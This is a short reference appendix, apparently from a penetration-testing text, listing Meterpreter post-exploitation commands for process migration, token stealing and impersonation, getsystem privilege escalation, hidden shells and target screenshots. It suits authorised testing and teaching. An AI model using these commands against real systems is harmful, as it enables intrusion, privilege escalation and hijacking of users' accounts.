
Appendix B

use priv

Load the privilege extension for extended Meterpreter libraries.

ps

Show all running processes and which accounts are associated with each process.

migrate PID

Migrate to the specific process ID (PID is the target process ID gained from the ps command).

use incognito

Load incognito functions. (Used for token stealing and impersonation on a target machine.)

list_tokens -u

List available tokens on the target by user.

list_tokens -g

List available tokens on the target by group.

impersonate_token DOMAIN_NAME\\USERNAME

Impersonate a token available on the target.

steal_token PID

Steal the tokens available for a given process and impersonate that token.

drop_token

Stop impersonating the current token.

getsystem

Attempt to elevate permissions to SYSTEM-level access through multiple attack vectors.

shell

Drop into an interactive shell with all available tokens.

execute -f cmd.exe -i

Execute cmd.exe and interact with it.

execute -f cmd.exe -i -t

Execute cmd.exe with all available tokens.

execute -f cmd.exe -i -H -t

Execute cmd.exe with all available tokens and make it a hidden process.

rev2self

Revert to the original user you used to compromise the target.

reg command

Interact, create, delete, query, set, and much more in the target’s registry.

setdesktop number

Switch to a different screen based on who is logged in.

screenshot

Take a screenshot of the target’s screen.